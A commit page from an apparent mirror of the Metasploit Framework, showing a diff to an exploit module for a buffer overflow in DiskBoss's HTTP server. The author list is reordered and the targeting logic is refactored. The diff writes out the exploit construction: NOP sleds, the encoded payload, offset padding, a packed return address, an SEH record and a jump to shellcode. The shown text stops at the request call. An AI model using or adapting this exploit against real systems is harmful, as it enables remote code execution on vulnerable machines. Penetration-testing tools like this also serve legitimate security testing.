infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated per review comments.

MS-2855/keylogger-mettle-extension
Pearce Barry 2017-12-08 10:42:43 -06:00
parent c79186593a
commit 604b949e23
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
1 changed files with 7 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
modules/exploits/windows/http/diskboss_get_bof.rb
View File

@ -23,8 +23,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' =>
[
'vportal', # Vulnerability discovery and PoC
'Gabor Seljan', # Metasploit module
'Ahmad Mahfouz', # Vulnerability discovery and PoC
'Gabor Seljan', # Metasploit module
'Jacob Robles' # Metasploit module
],
'References' =>
@ -127,21 +127,23 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Selected Target: #{mytarget.name}")
end
if !(mytarget == targets[3])
case mytarget
when targets[1], targets[2]
sploit = make_nops(21)
sploit << payload.encoded
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
sploit << [mytarget.ret].pack('V')
sploit << rand_text_alpha(2500)
else
when targets[3]
seh = generate_seh_record(mytarget.ret)
sploit = payload.encoded
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
sploit[sploit.length, seh.length] = seh
sploit << make_nops(10)
sploit << "\xE9\x25\xBF\xFF\xFF" # JMP to ShellCode
sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode
sploit << rand_text_alpha(5000 - sploit.length)
else
fail_with(Failure::NoTarget, 'No matching target')
end
send_request_cgi(